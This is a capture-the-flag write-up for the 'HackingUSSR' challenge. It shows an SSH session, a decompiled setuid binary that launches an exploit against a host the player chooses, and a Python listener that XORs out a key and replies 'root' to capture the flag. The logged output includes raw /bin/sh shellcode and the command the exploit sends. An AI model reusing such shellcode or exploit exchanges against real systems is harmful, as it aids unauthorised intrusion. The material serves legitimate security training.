Rating:
# HackingUSSR
by mito
## 18 Solves, 489pt
It's a challenge to connect with `ssh` and look for flag.
```
$ ssh -p 41705 [email protected]
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
youngPioneer@fd32dfdbd392:~$ ls -l
total 16
-rw-rw-r-- 1 root root 414 Apr 13 15:47 README
-rwsr-sr-x 1 root root 8696 Apr 17 21:39 throw
youngPioneer@fd32dfdbd392:~$
```
We transferred the `throw` binary using base64 locally.
The result of decompiling `throw` binary with `IDA` is as follows.
`/root/throw.py` cannot be read because it is under /root.
```
int __cdecl main(int argc, const char **argv, const char **envp)
{
char *envpa; // [rsp+10h] [rbp-10h]
__int64 v5; // [rsp+18h] [rbp-8h]
envpa = "TERM=vt100";
v5 = 0LL;
execve("/root/throw.py", (char *const *)argv, &envpa);
perror("execv");
return 1;
}
```
When `throw` is executed, the following message is displayed, so it is necessary to connect to the local server.
Therefore, I was able to set `NAT` of the WiFi router and connect to the local server.
```
youngPioneer@fd32dfdbd392:~$ ./throw
usage: /root/throw.py ATTACK_HOST ATTACK_PORT
```
We made a server program to send the result according to the contents sent from throw binary.
Finally, flag was sent to `whoami` by returning `root`.
```
import socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(('192.168.11.49', 31336))
s.listen(1)
while True:
conn, addr = s.accept()
with conn:
data = conn.recv(1024)
print('data : {}, addr: {}'.format(data, addr))
p = data.find(b"/bin/sh")
a = data[p+8:p+24]
print(a)
f = ""
for i in range(16):
f += chr(a[i] ^ 0x41)
conn.sendall(f.encode(encoding='utf-8'))
data = conn.recv(1024)
print('data : {}, addr: {}'.format(data, addr))
conn.sendall(b"root\n")
data = conn.recv(1024)
print('data : {}, addr: {}'.format(data, addr))
```
The execution result of the server program is as follows.
```
$ python3 server.py
data : b'\xebUAAAAAAAAAAAAAAAAAAAAAAAAAA\xc0\xc7\xff\xff[\x8ds\x081\xc9\x83\xc1\x041.\x83\xc6\x04\xe2\xf9S\xba\x10\x00\x00\x00\x8dK\x08\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80[1\xc9QS\x89\xe11\xd2\xb8\x0b\x00\x00\x00\xcd\x80\xeb\xfe\xe8\xc4\xff\xff\xff/bin/sh\x00B1E4dE7eeec14f94\n', addr: ('152.14.93.208', 60332)
b'B1E4dE7eeec14f94'
data : b'whoami\n', addr: ('152.14.93.208', 60332)
data : b'echo "flag{tw0_p1u$_t00_equ@15_wh@t3v3r_th3_p@rty_s@y5_c0mr@d3}" > /etc/motd\n', addr: ('152.14.93.208', 60332)
```
The execution result of `throw` binary is as follows.
```
youngPioneer@0f681065a144:~$ ./throw 58.xxx.xxx.xxx 31336
$<5>[$<2>+] Opening connection to 58.xxx.xxx.xxx on port 31336: Done
$<5>Sending sploit...
W00t! Sending `whoami`...
W00t! Sending `echo "flag{tw0_p1u$_t00_equ@15_wh@t3v3r_th3_p@rty_s@y5_c0mr@d3}" > /etc/motd`
[$<2>*] Closed connection to 58.xxx.xxx.xxx port 31336
youngPioneer@0f681065a144:~$
```
